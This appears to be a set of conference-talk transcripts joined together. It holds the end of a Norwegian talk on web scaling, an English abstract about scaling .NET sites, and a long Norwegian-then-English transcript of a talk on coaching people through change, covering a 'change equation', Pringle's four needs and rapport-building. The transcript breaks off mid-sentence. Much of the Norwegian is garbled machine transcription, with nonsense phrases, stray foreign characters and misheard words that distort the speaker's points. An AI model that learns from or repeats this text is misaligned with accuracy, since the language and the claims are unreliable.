tasken og gjøre det slutt igjen. Det har jobbet ganske bra for oss, for en veld, til vi har fixet det, når vi har tid, men det var... Hvordan bruker du ASP-NBA i atl. Hvis du har brukt en tid? Jeg er ikke sikker på hvordan det fungerer. Det kommer til å være fast for utgjørsdelen, men det kommer til å ta opp en enn enn en trafikkjære, så jeg tror det kommer til å fungere på noe sted, men det kommer ikke til å fungere på det samme måte. Hvis du har brukt en tid. OK, og så er der......option for å rejse løsninger. Tryk å rejse hver løsninger som du kan å kjøpe, fordi køpe løsninger slutter bare på performanser. Det er løsninger som er lagt til å skale, og hvis du har å gjøre ting innover alle utgjørsdelen, alle data, Og så kommer man så piper av blandingsfattaren... Og også en tacj greit liv, så om man kan kratte det som opp byggett vi... Så, konklusjon. Mås everything everywhere, og så mye, så mye data som kan. Do small iterations, and measure again afterwards. Se that you actually made things better. Don't stop thinking about speed, and scalability, because if you, the, once you stop thinking about it, it stops working, or it's become slow. And embrace other platforms than the ones you are familiar with. Do try to use memcached and ready send Linux on the things that's not called, or your domain code, and you will probably, it will be easier and faster and cheaper to scale. There are some other presentations on scaling here, this, on this conference. A lot of them are tomorrow, and you should go and see them. Yeah. Questions? No, thank you.
|
Having a popular web site is great, but what do you do when you can't handle the load anymore? When throwing hardware at the problem only gets you so far, where do you continue? And how can you fix it by this afternoon? This talk is based on the lessons learned from building two web sites where the user mass got out of hand, and there was very limited money, time and hardware to throw at the problem. While the users growth continued, there was no time to lose and the developers had to learn how to scale in a hurry. This session will give a lot of tips and tricks on how to scale your .NET apps on the web.
|
10.5446/51417 (DOI)
|
Hei! Hei! Jeg er Kristoffer Sønnsed. Jeg arbeider for Purgramatrikling. Jeg er her til å gi ut tre av Jeffs bøk. De er brandne. Vi har de. Den nede er støtt i kastet. Du kan være først til å ha den. Derfor fram i sessjonen barker du til klidene på Twitter eller ta fra telefon. Om du ikke har Twitter på denne ek hearingsf ersten. Jeg vil d Laura Hå comprehend? Takk. Velkommen, alle. Takk for å komme. Jeg heter Jeff. Som du vet, dette sesjon er næte om hvordan simple maths og belieft kan hjelpe deg til å kjente folk til å change. Så jeg vet at dette komprens har en kvart adjølig fint til det. Dette tal er ikke spesifikt fokuset på adjølig. Det er mer fokuset på hvilken situasjon du finder seg i, hvor du må måtte til å hjelpe noen til å change, eller du er kjent til å gjøre noe som kan change seg selv. Og det er noe du kan gjøre til å helpes å gjøre det mer lykkesfra og mer succesfra. Så du kan se dette fra positionen av en manager eller en leder, en skrummaster, en kjøk, kanskje en venn. De principaler jeg skal tale om og de praktisene jeg skal tale om er fokuset på en til en måte, men det kan være opplagt til team situasjoner også. Hvis det blir noe i dette som du kan ta av. Hvis vi har en høy her, det struktur av talet er baseret på 4 ting, det er 4 partene til det. Det første er bare å revisere hva eller spørgjende hva folk finder det svært å change. Hvorfor er det naturligvis svært for noen folk til å change, som dere og andre. Jeg skal innfølge deg til en av min modeller som jeg har brukt når jeg kjøkker folk til å change, som jeg kaller det change equation, som er det simpelige matepartet. Jeg skal også innfølge deg til en veldig forskjellig data som jeg har stundet på. Det er ganske relevant for å kjøke folk til å change. Det er om å ta ut en til en til en åre. Hvis du ser en annen analys og en annen simularet til situasjoner som vi har kjøket ut av å ta ut. Og så rapper vi oss om en annen modell som jeg har brukt som har en belieft og taler mer om det når vi får det. Det er først som jeg har gjort dette talet live. Og så er jeg ikke sikker om jeg skal ha tid på enden for noe eller ikke. Jeg håper det, men jeg kan ikke skjønne det. Så hvis jeg ikke har tid for noe, så vil jeg give deg min kontakt i detaljer, og vi kan follow opp afterwards. Så, over til deg, til å begynne med. Og jeg vil sige til deg en frå. Hvorfor tror du at folk ikke kan change? Hvorfor finder folk det svært å change? Skape. Exklusst. Hva er det? Hva er det? Hva er det? De er ok. De er ok. Ja, ting er ikke så bra. Ja? OK, bare for å kjenne. Hva er det? De er på lokalt maxim. De er på lokalt maxim. Ok, så de har dette lille bubbel. De har det gøy med det. Og å få ut av det, de må ta ut det siste i siden av... De må ta ut av det. De må ta ut av det. De må ta ut av det. Det er interessant. OK, så hva som de tar ut av det, de tar ut av det, men det blir sikkert til dem i lang tid. OK, så, selvfølgelig, takk for å joine inn. Det bøder så bra. Min vis, så dette er en av min mottos, hvis du liker, det er en av min motoroperandi. Og det er at folk ikke nøyvendig skjer å ta ut av det, men de er skjer at de må ta ut av det, i forhold til å ta ut av det. Og jeg tror vi taler om det med dette lokalt optimistisk bubbel. Og ting er OK. Hva det er, hva det er, hva det er en habit, hva det er en behov, hva det er en arbeidning, hva det er vi må vil ta ut, eller hva vi må ta ut. I forhold til å gjøre det, vi må ta ut noe behind. Dene habit, dene forholde, de mentale modeller vi har, de måter vi har å vise i verden. De er en av oss. Og vi må ta ut det som er en av oss behind i for å ta ut til noe andre. Og det har vi jo blitt gammelt utstået, det er gammelt skært. Så vi må være beværende av det. Løpet er ikke veldig simpelig. Det er ikke så simpelig som A, B, C. Hva det er, vi trenger vi må ta ut eller vil ta ut, først, vi må ta ut det. Vi må ta ut det. Og somtalsen kan vi ikke, vi er ikke beværende av det. Vi kan gjøre noe som en ganske, unnerlig, en ganske, personlig eksempel, hvis du liker det. Men for å si til dette, en av de ting jeg har gjort, er at jeg skal rekordere meg til å kunne høre ting jeg gikk like om det, ting jeg ikke gikk like om det. Og en av de ting jeg har notist, når jeg gikk til dette, dette tal med meg til meg, var at hver eneste, jeg gikk, jeg vet ikke om du kan høre det. Nå, du ikke må ha notet det, hvis jeg ikke hadde sagt det, men nå, forstår jeg, det er det eneste du kan notere, for resten av dette tal. Hvis hver eneste, jeg vil ta et brett, og jeg vil ha det her skjønt. Nå, jeg var ikke sikker på det, hvis jeg gikk til meg til å høre det, til meg selv. Og hvis jeg var sikker på det, hvis noen hadde sagt det, eller skjøntet meg, så har jeg bare kjært på å gjøre det. Så vi har dette utstilling. OK, det er en sild eksempel, men vi har det, vi må utstilling, vi må utstilling. Og når vi gjør det, vi må egentlig ha en certain amount av braverie til å gjøre noe om det. Nå, dette er mer fundamentale psykologisk, som vi kanskje måtte være med til å begynne med. Det er en interessant papar som du har, så ser du, som du må ha redd, men hvis du har en gammel gammel gammel, David Rock, han var kjøkke på en studie som har vært i UCLA i Amerika, i Eisenberger. De studierne fokuserer på braverie som føler at det er rejsekt. Nå, jeg er ikke så kjøkke på rejsekt, men en av de ting som de studierne har vært, var at vi, som humanbejder, var at vi var krav for kjøkke. Vi var krav for kjøkke. De har hatt dette med å putte på fronten av folk problemene som ikke har en korrekt ansvar, eller situasjoner hvor de var unnskjort av hva å gjøre. De matte de arenes av braen, med funktionalne MRI-skansk de matte de arenes av braen som lette opp hver enn de situasjoner. Det som de har hatt var det samme arenes av braen som lette opp situasjoner av ambiguitet og kjøkke som lette opp når folk var oppvåret i fysisk kjøkke. Så det som de har klart var at vi var hårdvendig å avvåre kjøkke. Vi var hårdvendig å avvåre ambiguitet. Så vi trykker og så mykke som kan avvåre det. Og det som skjer er å brise det, at vi er at least kjøkke kjøkke. For det er en kans at det ikke måtte jobbe og vi måtte løse noe kjøkke behind. Jeg er ikke sikker om du er familiar med de arbeider av det grønne australian philosopher Kylie Minogue, høyest av høyest. Det er bedre høyest du vet. Du er oppnået fra 1980-er. Men det er veldig... Jeg kommer på dette kvot og jeg kommer på det på mange folk som vet at ting ikke er helt arbeidt perfekt for dem. De vet at ting ikke er bra. De skulle røde å stikke med det som ikke arbeider men de vet at det måtte jobbe at de ikke vet. Jeg har sett at folk sier til meg helt spistisk. Jeg vil ikke ha en viss ting jeg vet som kanskje en viss ting jeg vet ikke. Det er en real fenomen. Vi må være bra å gå med det å gå til det unnoet om du vil. Og så når vi har det bra men vi må ha en kommittement fordi, nærlig, når vi realiser at vi må gjøre noe, det er ikke bare en kvitt å skrive en kvitt og si, ægler meg, jeg vil bye det nye behov. Jeg vil skjønne min praktis. Der er du. Der er du en kroner. Det skjønner min musselmeme og behov som har vært tilgjort for å bygge og må være behov tilbygd med ny behov og behov. Det tar en masse tid til å gjøre det. Over tiden er det veldig svært som kanskje å associae dørens med de lille konsekvenser. Så hvis, for eksempel, jeg vil blande kvitt. Jeg måter rundt ned i ekspoet og jeg ser alle de steder med lille små og lille sjokkler og fysikker og ting. Jeg tror, hva en sjokkler ikke skal gjøre en kvitt, ikke? Hva en sjokkler er det? Det er veldig svært å tage etter en sjokkler til den lang termen utdelen. Så dette kommittement over tiden disciplin. Så det er hvor forkansk er ikke veldig simpel. Nå, jeg vil innstå til min forkanskjeqvitt. Så dette er hvor simpel småk kommer inn. Jeg var værkking om bare at mæthene i tider skulle skære folk av. Jeg var litt børn om det. Så det oppe, jeg har fått deg inn. Så jeg har fått mæthskjekene inn, har jeg? Fantastisk. Jeg er ikke mæthskjek. Jeg vil trye og kjøpe det simpel for min forkanskjeqvitt. Så dette er min forkanskjeqvitt. Jeg tror at det er tre faktorer å kjøre og alle kjører når kjønner om om de skal kjøre eller ikke. Så de faktorer er det som har fått være noe i det som for meg. Det har fått være dette ideet at det jeg har å bevare er mer beneficjøske bedre for meg som det jeg er der jeg er nå. OK? Det er det probabilitet at det skjønner blir bra. Det er ikke garantiet. Vi må kjøre på den måten. Det må ikke være så god som vi trodde det skulle være. Det er en probabilitet som faktorer. Så det vil det vil ha skjønner vår beslut til å gjøre det eller ikke. Og så de første faktorer er om kjøsten av kjøsten. Så kjøsten har en nummer av bedre elementer. Det kan kanskje være en realt absolutt kjøsten. Så hvis jeg var kjønner for eksempel at jeg har kjøsten. Jeg må kjøre kjøsten. OK? Min mussel går til å høre. Det er køsten for meg. Det må være kjøsten for deg der også. Som for meg å kjøre dette kjøsten må jeg give up å være i min nøddelig komfort bedre for en ekstra hård i morgen eller siddende i front av fotball på sofaet. Jeg må give disse ting upp i for å få det. Så det er kjøsten der. Det er en intressant ting om kjøsten i dette rengjord. Det er en kjøsten som ikke er god for det å være kjøsten. Den benefiten times probability har å være bedre kjøsten som kjøsten. I en måte kjøsten kjøsten. Nå, det er en ekonomisk koncept som kommer til å spille her kjøsten som kjøsten jeg er ikke sikker på det som kommer til å spille her kjøsten. Men det er egentlig en indamment effekt som sier at vi som kjøsten har stort valg på noe vi har som bare fordi vi har det som det samme om vi er prøve å kjøste til noe vi ikke har. OK? Nå, det siste måten å spille det er om jeg gi deg en 1000 kroner du skulle få en satansfaktion fra det. Du skulle være glad. Jeg tror. OK? Hvis jeg kjøste 1000 kroner opp til deg det omkring dissatisfaktion du skulle få blir det grønere en satansfaktion du har da du har en 1000 kroner. Du ser hva jeg sier? Det er ikke kjøs. Economisker synes det er rettig. De synes det er irrasjonalt. OK? 1000 kroner er 1000 kroner. Du må ikke kjøre. Men det er en realitet. Folk er irrasjonalt. Så du må kjøre det i minst. Hvis det benefitet her er 1000 kroner og det koster 1000 kroner jeg kommer ikke å gjøre det. Jeg kommer ikke å gjøre det. Så vi må kjøre det de partiet av de her. Nå, jeg vil si det er at som en coach eller hvis du tar en coach oppdrag du kan influere de partiet av de her for deg selv eller for personen du har tatt til å hjelpe. Ja. Du ser på at folk vil skjønne. Hva er det hvis du har forstået å skjønne? Jeg tror ikke at det er en kjøs å få til å skjønne at du har skjønne oppsett på deg. Så det er det. Så det her er slik at det holder hvis skjønne er forstået på deg er det det ene relevant for skjønne som er volentært forstået til å skjønne. Er det det? Ja. Jeg tror det det definitivt effekterer. Det er det. Det er faktisk å tala om noe som har kjøpt til det fordi det skjønne er mer som å være succesfull. Det probabilitet av succes er mer grønne hvis det skjønne er åbe med personen som undergerer skjønne. De må åbe det. Eller at det har satt at de har åbe det. Og så det er absolutt et veldig, veldig valgt point. Det er probably hvis det er de case som skjønner og som har vært forstået de. Kostet probabilvis ser bedre og benere som har vært småere. Og de er lest kommittet til det som succesfull fordi det ikke er det. Så jeg tror det faktisk som har vært forstået stort. Det er bare svært å få det til en positiv akkurat. Er det sant? Ja. Så jeg har vært forstået å gå til hus. Forstået å gå til hus. OK. Jeg kan ikke follow in the question. OK. OK. Stikk med meg og se hvor det går. OK. Jeg sa at jeg skulle innvindre deg til å få en ganske forskning. Jeg har en kjøp til noen som var bort i de 50'er og 60'er og tror jeg har at jeg har å kjøpe dem på å kjøpe dem. Men data 50, 60 år gammel er generellt kjent til å være avdeltig. Jeg tror det. Så jeg vil vil dere bære det i min. Dette data som studiet og det som jeg taler om her Mir Kelmer Pringles Neid av Kilderen er baseret på data fra de 1950'er og 1960'er. Det er også baseret på en studiet som er responseret ved et kjøp av det i U.K. et kjøp av høy og sosial services. Du har også bæret min på det som det var en responseret studiet. Så jeg har ikke putt så mye fag i det. Hvis du har kjøpt mine studiet jeg kom igjen på dette book og jeg har kjøpt det og jeg har tatt at det har en sødre relevant. Det ser ganske relevant til de utplassene jeg er i og de jeg arbeider med og de jeg køper. Nå, det book seg var sommerisering mellom andre ting det næsjere kjøp development studiet som var undergående i U.K. som jeg har sagt i 1958. Vær en komprehensiv studiet studierede over 17.000 barns hver barn som var bort i en sødre i dag av 1958. Og det kjøpte sikkert for å få tid det kjøpte en masse data. Så det kjøpte en masse data om prengen det kjøpte en masse data om sosial ekonomik konditionen og situasjonen av familien. Data om møder, birth, barn som var bort og så følgte de barn over sitt livsdag. Og som dere kan se på slags der, det var tre bort av dette studiet å finne ut hva barnen nødde i for å develop fullt og kjøpte til sødre funksjoner barns hvor de gikk de nødder fra og hva de konsekvenser var om hvis de nødder ikke mødte. Og så Pringle var en analysering og hun fanns at det var for bort nødder av barn i for å develop og kjøpte og det første var nødder for lov og sikkerhet som kan si at det er generelt at folk tror, OK, barns nødder lov, de nødder sikkerhet. Det er ikke viss annet kontroversial. Det ser mer fint. Den første nødder var om nødder for nødder for ny erfarenhverv ikke necessarerat å kjøpe fra spesiet, men nødder til å være på i front av dem nøde å kjøpe relevant for deir året så de kan kjøpe, de kan vere de nødder. Den første nødder som hun identifikk var nødder for å kjøpe og rekongisjeren. Så på det å kjøpe det er en det er en kjøpe ting og kjøper generelt kan ikke åpne av å kjøpe. Du må bare gjøre det. Det er en kjøpe som er forst opptatt på dem, jeg tror. Og det som helst dem i denne måten er det som kjøpe og rekongisjeren. Det er en god ting. Du er gammel. Dette er det første nødder som var identifikket var nødder for responsibilitet. Nå, min intensi her er å kjøpe de forneige fra to perspektiv. Det første er fra den originale perspektiv, Pringles perspektiv når du ser på å kjøpe av barnene. Og den sikker perspektiv er å trye å dra en analys til kanskje det vi er gjørt, køpe ganske og køpe hvordan vi kan bruke denne kjøpe til å influere denne kjøpe. Og gjøre det mer like å være succesføl. Så det er det jeg skal gjøre. Vi starter med lov og sikkerhet. Og lov og sikkerhet er det det vi har. Denne pringlesen er det denne fundamentale nede. Ok? Det er det som effektivt. Det pre-requisite hvis du vil. Denne er det andre neder som ikke har hver en hel del effekt på barnene. Material effekt på barnene. De har dette stabilt dependable base som de kan ventre ut sikkert. De kan de kan messes rundt fra time to time med ingen nede til å kjøpe av apparencesen og kjøpe av formaltigheter. De kan indøde sitt barn til å kjøpe av formaltigheter. Det var baser på skjøp lov og sikkert. Så de skjøpene ikke ble til å give noe i regjene. Og det var noe konsistens til det også. Så hvis jeg gjør noe hvis jeg gjør behov av x så kan jeg til å beskjedde hva. Det var konsistens og rutin som var bilt til det. Ok? Så de er de ting som pringlesen har hvitt. Og det vil jeg å gjer på det som til å realere livet som det var. Og jeg har en annen frå for deg. Kan du kjøpe noe som du ikke liker? Hva tror du? Hvem tror du det? Ok? Det halv så jeg presumer den andre halv ting nevn hans oppe for nevn? En bit av en blitt respons. Min vis er at det er möjlig. Det er absoluttancer espaço men krijt seg en om han dec Gancribe det er Hvis du går til dette, med en viss utdrag som de kan, du har en respekt for dem, en respekt for de potentialene og de kjøpigheter, så er du mer like til å være lykkende i din jobb av å koke dem, i din roll av koke dem. En annen interessant studie jeg vil til å throw inn i mix her, som er oftere referert til, er den Rosenthal Jacobsen studiet, men også som en nykning, hvis du liker det, som en pygmaling effekt. Har anyone hørt dette? En studie har gjort i skolen, hvor en gruppe av siden, som gav en klasse, en IQ-test. De var ikke kjøpt av denne IQ-testen med noen, de hadde det informasjoner seg selv. Men det de gjorde, var at de gikk til en klasse, og de andre klasse i skolen, og de sa at 20% av de klassene i dette klasse, de hadde skjøpt på random, var gået til over de kommende 12 måneder, skjøpt, blå, gikk fantastisk. De sa, se ut for de klasse, de er gammel. I 12 måneder, og det er ikke noe som skjøpt, de klasse gikk blå. De hadde det i IQ, når de var testet i 12 måneder, var statistisk forkjøpt, siknskjøpt, men de klasse var gammel. Så dette effekt er at bare for å belive at de klasse blir mer intelligente. De gjorde det. Det var ikke magisk, men for å belive det, de klasse skjøptet, som skjøpte de klasse, som skjøpte de klasse, som gikk til å gjøre det selvfølgelig. Så jeg tror at min frå her er, hva tror du at de, de teamene, de kollegene, de klasse, kan være kvalitifat av, hvis du gjenlig believer i dem? Det er en retorisk frå, selvfølgelig. Nå skal vi gå til det. En punkt jeg vil gjøre her, som jeg veldig rædlig har mennesker om klasse. Mange folk sier at en person som klasse måtte ha respekt for klasse. Men mange folk taler om det som en to-ske. I min opinion, dette respekt måtte være en to-ske. Respekt er kvitt her. Pringle taler om lov og sikkerhet. Jeg er ikke nøy til å tale om lov og sikkerhet, jeg taler mer om respekt og sikkerhet. Det er en analyser for meg. Så, hva er det? Det er min frå. Du har haft en preview av dette. Du har tid til å si. Hva har noen gjort til å hjelpe deg å følge mer sikker i de som er kvitt? De er kvitt i deg. De har gjort dem selv vennerende til deg, som kreiser din tro på dem, som gjer deg mer like for å kvite dem. Fantastisk. OK, noen annen? Jeg gjør noe som jeg ikke må gjøre, ikke? Jeg har skjedd noen på spot, og frå dem om å gjøre dem sikker. Det er en annen ironik. Safet er en elusiv koncept i mange situasjoner. Ja, vi må gjøre dem sikker, men hvordan gikk vi det? Det simpleste ting, og det første ting vi skal fokusere på er om konfidensialitet, bare å oppnå grønnen, og på en måte, og på en måte, at det er hva som har sagt her, som er mellom oss. Jeg er virkelig livet av at gjør deg selv vennerende først, og å truste dem, og å kreise en sent av sikkerhet der. Hva som skjer her? Hvis noe er ikke vant, er det president Avama og de prime ministeren i UK David Cameron. Håll om en beskubel. Hva som skjer her? Mirroren. Fantastisk. Takk. Mirroren, eller som mannesk, er det en av de oldest teknikken som er kvitt til man, i en av å stå i kvitt. Stå i rapport. Hva som skjer hva som skjer eller skjer hva som skjer er at du er egentlig satt til denne personen, jeg er som deg, som skjer en sent av vantning. Og de generellt liker folk som de perceiver som de liker dem. Det er ikke viss å være visuelt og fysiskt, som mannesk, body posture, og det kan være. Det kan være viss å være viss og viss å være viss attitut. Det kan være viss å være bare noe viss i viss. Så om dette match og å få dette ut i kvitt. Det er bare viss å være tribelt. Det går til å write om du er en av mine tribelt eller ikke. Hvis jeg liker deg eller du liker meg. Du skal være veldig kvitt med dette. For du kan overdo det. Så det er Cameron som er veldig kjent med sin ny pal. Det er veldig kvitt å overdo. Det er veldig kvitt å være visst og overdo det. Og når det skjer det ser litt som om du har tatt å manipule denne personen eller patronisere denne personen. Det kan ha den oppe effekt som betyr. Hvis det er det som vil veldig ganske å stå i et sikt av kvitt og et sikt av rapport. Start å bygge et sikt av sikt og et sikt av et parnapp, hvis du liker. Hvis vi har et sikt av sikt og vi har et sikt av parnapp, jeg er ikke i dette selv. Og når jeg ikke er i dette selv og jeg kan oppvise mer, jeg er mer able to take risks. Nå, en av det ironies om dette er at du har probably er det probably veldig god at mirroing og matching oppropretelig før. Men hvis du har noe like meg, hvis du har vært dette har vært draart til din utdrag, du har begynt å se deg selv doing it. Og du tror, å, nei, er dette virkelig oppvist? Er jeg gammel i David Cameron? Og bare for å være veldig, det stopper til å bli naturlig og det har ikke vært så. Så ja, eventually you'll just forget about this and you'll go back to being your normal excellent mirroring matching selves. Something else in terms of building up rapport is a concept known as perceptual affinity. So I'm drawing on a lot of studies here, this is based on a study by three people, Goldstein, Martin and Childini and they found that waiters and waitresses that repeated back directly what was ordered to the diners received 70% more tips than those that didn't. Just simply by saying exactly the same words. What that did they found was established a sense of I'm being listened to. Therefore you care for me. Therefore we have a connection and I'm more likely to reward you. Now when it comes to coaching we're not looking for a tip usually. What we're looking for with this kind of active listening and playback and connection is the gift of trust. The gift of rapport. And once we have that we can then use that to help them. We're building up this relationship. So how can that play out in the field of coaching? Well just listen. Remember what people are saying. Show that you remember. So what are their children's names? Have they got anything important coming up? Anything that's worrying them that you can ask them about? Just show that you're interested. Show that you're listening. Show that you care. And then we have that. We have that respect. This respect and safety is just like love and security at the Pringle found. This is the fundamental thing to be able to coach somebody. This gets you in the door. This gives you the opportunity to start positively influencing their situation and that change equation. OK, back to Pringle. Need number two. New experiences. No, when Pringle was talking about here were age relevant and competency relevant new challenges. So for example, learning to crawl, learning to walk, learning to talk. Things that were put in front of the child when they were ready for their situation. What she found here was that these tasks, these challenges should be both challenging, difficult, but also achievable. And they were stepping stones for later development. So as well as being valuable in their own right, learning to crawl is valuable in its own right. You can get across the room. It's also a stepping stone to being able to walk, which is the stepping stone to other things as well. Baby steps, if you like, if you'll forgive the pun. Now, the bottom three bullet points on this slide, I think, are really particularly relevant to the world of work that we're in at the moment. So the first one here is talking about the need to learn how to learn. So these new experiences were key in helping children learn the process of learning. And that's something that more companies and teams I work with, I find adults need to relearn how to learn. We have to learn new things so often. And play is important to learning. I'm going to talk a little bit more about play later on. She found children who learnt through play learnt quicker and learnt deeper, which is, I think, still relevant to adults, no matter how much we might like to say how sensible and mature we are, we still like to play now and again. And the third one, again, if you've ever come across anybody who seems a little bit, as it says here, passive, fearful, or irritable when faced with something new, it's often the result of how their previous experiments or attempts to learn or attempts to change have been dealt with. If they've been treated with disapproval or discouragement or even worse punishment, then they're less likely to try something new again. They'll retreat back into their shell. So these are things to bear in mind. So how can we use this in our situation as a coach? Well, the first thing is around making clear what it is that this is all about. Why are you doing this? Making it personal, visualising and clarifying the purpose of this change. As an example, if my idea was to lose weight, for example, what is losing weight going to do for me? What will it feel like for me? Why should I do that? There's got to be a reason for it. If I was coaching a team, for example, and in the retrospective, I might ask the question, so how would you rate yourselves on a scale of one to ten on communication? And I get some answers ranging probably between five and eight. Nobody really wants to say ten, nobody wants to say one, they'll have somewhere around there. Which is a good thing, we've got something to build on. That's always helpful. But equally, I could follow that up with, so what would ten mean to you? Why would it be valuable to you to achieve ten out of ten on communication? What would that look like? What would that feel like? And by making that more tangible, making that more personal to them, we'll increase the benefit to them of that change, increasing the B on the change equation, if you will. Someone who did this quite well was a guy called Robert Guisetta. Familiar with him, he used to be the chairman, CEO and MD of Coca-Cola. And one thing he famously did was he created a goal, a challenge, for the company a number of years ago. He worked out that on average, everyone, all of the six billion people on the planet, they consumed 64 ounces of liquid a day. He worked this out. Han fanns også at på en avsiden en person kjører to årens av Coca-Cola produkter. De to årens av deres 64-års-kola. Han kjører denne company til å kjøre den 62-årens gap. Den første stedet i å kjøre denne gap, var å kjøre kola-intak, eller kola-skjære, fra to årens til fy årens. Det var lyst til å motivere folk i Coca-Cola. Det var de to steder som var lyst til å motivere folk. Det første var å kjøre denne gap. Det var... Folk kan tro at noen kjører 64-årens gap av likt. De kan tro at det. De kan også tro at det er to årens. Tredje årens til fy årens ikke ser noe bra. Vi har jo også... Vi er nød til å finne. Det er ikke så mye for å gå. De er en av de løde og løde. Det er en av de løde og løde. Det var noe som var lød og lød til å finne. Det var ikke årens. Løde som er året til folk, er mer lyst til å være lyst til. Det er viktig å se hva de vil gjøre, hva de tenker. Hvorfor er det viktig til deg? De er rett til å være lyst til. De som er løst til å være lyst til å gjøre det. Bevære å gå til Pringle, kommenter om å være skjønt eller tilfølge. Det er viktig ikke å gjøre det. De har jo hørt av det Goldilocks effekt. De har jo hørt om det Goldilocks historie. De som var i min sesjon i morgen har experience det. De har vært vært i å gjøre. Det er fantastisk. Det er effektivt å si at det er bare i kvar. Den første er kveld, den første er kveld, den første er kveld. Den første er kveld, den første er kveld. De som har vært til Pringle, kommenter om de som er kveld. De må være kveldig men kan gjøre det. Det er det vi kaller det Goldilocks effekt. Det som er stimulatelt kveldig, men ikke forstås av det svært. Hvis det er så svært, så kører vi ikke. Vi er ikke interesser. Det motiveres ikke. Hvis det er så svært, så kører vi ikke. En av de ting vi kan gjøre er å ta og ta help. Vi kan ta og ta help til at de er køkene som er bødre oppe. De er oppe til oppe til de skjønne. De er køkene. Det er 2-mål gatt, rettere enn de 62-mål. Gjøy det. En annen ting vi kan gjøre er å ta og ta help til skjønnen som de ikke vil gjøre mer funn. Hvisloading møter med proprer stalker pasta 191 205 og opps월anced 14.至im繁r slider. Goddidd, slamstid på Laktoskallen. 372, gj스wo 28C. De var s normale emene uglet för groomer. Ogmu smørEN Drive supreme. Helt søvlig kan vi gjøre noe av de gole. Så her er det en ting jeg vet hvordan å gjøre. Vi skal skjøpe ting litt. Jeg må ha en liten oppvarsing. Hvis ikke, så skal det ikke gå over veldig. Så her er det jeg må ha, spesielt dere i fronten, for du vet hva som kommer. Jeg må ha en b! Jeg må gjøre det med stalt og klap, og jeg skal gjøre resten. Jeg har fem flytter i dag, og jeg må ikke gjøre det. Det er en liten oppvarsing, og jeg skal gjøre resten. Er dere med? Så det skal være en stalt, klap, stalt, klap. Kom på, stalt, klap, stalt, klap. De kommer ikke å være der. Der er det. Gjør det. Det er flyt 372 på SWA. Flyttertene er på board og ser deg i dag. Teresa i midten. David i bakken. Min namen er David, og jeg er her til å snakke. Jeg må ta inn første ting, første ting, slags drink og kaffe, så du kan kjøpe. Men hvis du vil en annen dring, så er det bare hollet. Alkoholet har en b4-dollars. Hvis en monstret energi drinker, er det din plan å b3-dollars. Og du får denne kanten. Vi vil ikke ha din kast. Du skal kjene med plastik. Hvis du har en kuban, så er det fantastisk. Vi vet at du er klar til å få inn de nye bræsene. Håp denne venner, kål den ned, skjøp den ned. Kål alle skjøpene, og skjøp den ned under stalt. Hvis du har en kast på rød med en x-zipper, skal du snakke til deg. Så du måtte være utrolig. Du skal hjelpe deg til å vise deg. Hvis du ikke vil en annen dring, så skal vi rese deg. Når vi leave, er det vissere. Løs opp elektronikken. Fass inn din kastbæt, og opp opp plastikken. Løs opp plastikken og gjøre din kastbæt. Løs opp, sikkert. Løs opp, ha en god tid. Det er tid til å gå, så jeg er gjennom røden. Takk for denne kastbæten jeg ikke løs. Det er Southwest, Løs. Velkommen, min boy. Hjemmer, min boy. Håll på at det er bort. Løs opp, løs opp. Håll på. Vi kommer til å gjerne røden litt litt later. Men bare til å samle om hvor vi har kommet så snart. Vi er to... Helt til å gjøre, vi har vært med på to av Pringles nederne her. Den første om lov og sikkerhet, eller i vår kast, respekt og svenske. Det er den fundamentale, baselig løsning som vi skal ha. Så vi kan faktisk starte med denne kastbæten. Når vi har det, når vi er på kastbæten, kan vi åre denne nederne. Denne personen vil se til å gjøre det personelig og se på denne kastbæten. Hva betyr tenne? Når vi åretter denne kastbæten, åre denne kastbæten. Siden det er noe andre, eller noen andre, eller noen andre. Og det er en del av det som vi kan gjøre til å helpe å reduere kastbæten. Hålle siden det er en løsning, men også en løsning. Vi går til denne nederne. Det er kastbæten og rekanskning. Faktisk til Pringle. Pringle har hatt at kastbæten og rekanskning er nødvendig. Som løsning er nødvendig. Det er også baseret på faktisk at løsning er ondhøyd og at successen er consider å være innevitable. Det er mange parents som har vannet å løse til hva de vet. De har ikke til å gjøre det. De har stort præs, og de løsner og løsner. Det er faktisk innevitabilitet som gjer til det pigmælin. Pringle har hatt at når kastbæten er nødvendig, er det en element av intrinsik motivasjon. Det er en SolidarCOGF class Secret Service, men hans helttyngelig Zhangmonger verses alv OND两 eloemot. Det er ingen for for at de stare at places highest eastern halt i Qiuma at 2013. I wouldn't expect any of you to realise why this is an important date in the UK. I was unaware of it until I stumbled across a particular study. Apparently on the 21st of April 2013, this was the date statistically that most women in the UK started their diet. This is when they started trying their plan to achieve their summer bikini body. I can point you to the study if you don't believe me. They found that this was because it was 13 weeks before their children finished for their summer holidays. On average, women in the UK wanted to lose between 11 and 13 pounds of weight before the summer. What they've done, effectively, is they've pasted it out. 13 weeks to lose 11 to 13 pounds, that's achievable, that's unhurried. It's almost inevitable I can lose a pound a week. They've made their change more likely to be successful by setting themselves a sustainable pace to change. I don't know if you guys have used or still use the We Fit. Obviously other consoles are available and not sponsored by Microsoft or anything like that. Is it Microsoft? But this is another thing you can use to make sure that learning is unhurried. There's an extra element to this We Fit, which is effectively that the We Fit acts as your coach. I don't think it actually lets you set an overly aggressive goal for yourself. It plots your progress, your small successes. You can see your trend and the activities are a little bit like the Southwest Airlines. They're fun. There's something else built in there, the camaraderie. A little bit of competition perhaps, but also a little bit of camaraderie with your friends, your colleagues, your family maybe. This is again, learning is unhurried. You can set your own pace. It's treated as though success is inevitable, which helps the motivation. That's obviously an example of gamification. Gamification is becoming rather prominent in the workplaces that I see these days. Turning work into a little bit more like a game, generating voluntary involvement and engagement. And offering regular achievements. 60 levels, 60 achievements here. I don't know how many levels there are on Angry Birds, but you don't have to wait until you finish them all to get a sense of achievement. Regular achievements are put in front of people. And that's acting effectively as some praise, as some recognition of your effort so far. You haven't finished the game yet, but okay, you've unlocked this. This is good. This keeps people motivated. Change is often a long path, and these are little breadcrumbs of sustenance along the way, keeping us interested. It's an extrinsic motivation. Do this, and I will give you this reward. That's not necessarily a bad thing. Another explicit example of an extrinsic motivator here in terms of praise and recognition. This is some people, this is from my time at BT, in fact, where we set up some agile awards. So on the right hand side there you've got the best agile team, I don't know when it was, 2004 or something. And on the right you've got the best agile champion. These people were voted for by their peers, they were given recognition by people that they respected. Going back to Pringle's view that it's reinforced, the success, and the feeling of success is reinforced by someone that you respect, also thinking it's a good thing. So this is respect and recognition by your peers being reinforced. Another extrinsic motivator. Kcoming away from extrinsic motivators a little bit, recently I was in the States and I was faced with the prospect of a very long drive. I had to drive 